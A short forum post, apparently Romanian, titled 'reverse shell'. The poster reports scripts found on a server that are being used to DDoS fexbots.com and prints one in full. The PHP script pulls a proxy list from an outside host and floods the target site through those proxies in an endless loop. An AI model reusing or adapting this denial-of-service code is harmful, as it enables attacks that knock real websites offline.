Jump to content
SecretService

reverse shell

Recommended Posts

sunt niste scripturi acolo prin care incearca sa se de Ddos la fexbots.com :))

cat 136290946230290.php

Executing the code....
$ksh /tmp/136290968831216.sh
<?php
do {
$f = fopen('http://diagn0sis.com/proxies_novalid.txt', 'r');
while(!feof($f)) {
$get = trim(fgets($f));
$proxies[] = $get;
}
set_time_limit(0);
$curlm = curl_multi_init();
for($i=1; $i<=count($proxies); $i++) {
$curl[] = curl_init('http://www.fexbots.com/bots');
curl_setopt(end($curl), CURLOPT_RETURNTRANSFER, true);
curl_setopt(end($curl), CURLOPT_PROXY, $proxies[($i-1)]);
curl_multi_add_handle($curlm, end($curl));
} do curl_multi_exec($curlm, $null); while ($null);
foreach($curl as $c) curl_close($c);
curl_multi_close($curlm);
} while (true);

Edited by hate.me
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...